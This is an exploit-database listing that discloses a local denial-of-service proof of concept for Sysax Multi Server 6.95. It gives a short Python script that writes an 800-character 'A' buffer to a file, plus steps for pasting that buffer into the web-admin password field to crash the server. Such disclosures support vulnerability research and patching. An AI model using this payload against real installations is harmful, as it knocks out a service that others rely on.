Sysax Multi Server 6.95 Password Denial of Service (PoC)

2023.03.27

Credit: Luis Martinez

Risk: Medium

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

# Exploit Title: Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2022-10-05
# Vendor Homepage: https://www.sysax.com/
# Software Link: https://www.sysax.com/download/sysaxserv_setup.msi
# Tested Version: 6.95
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code: Sysax_Multi_Server_6.95.py
# 2.- Open Sysax_Multi_Server_6.95.txt and copy content to clipboard
# 3.- Open "Sysax Multi Server"
# 4.- Manage Server Settings...
# 5.- Administrative Settings -> Configure...
# 6.- Clic "Enable web based administration and API access"
# 7.- Login -> admin
# 8.- Paste ClipBoard on "Password"
# 9.- Save
# 10.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 800
f = open ("Sysax_Multi_Server_6.95.txt", "w")
f.write(buffer)
f.close()

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Sysax Multi Server 6.95 Password Denial of Service (PoC)

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.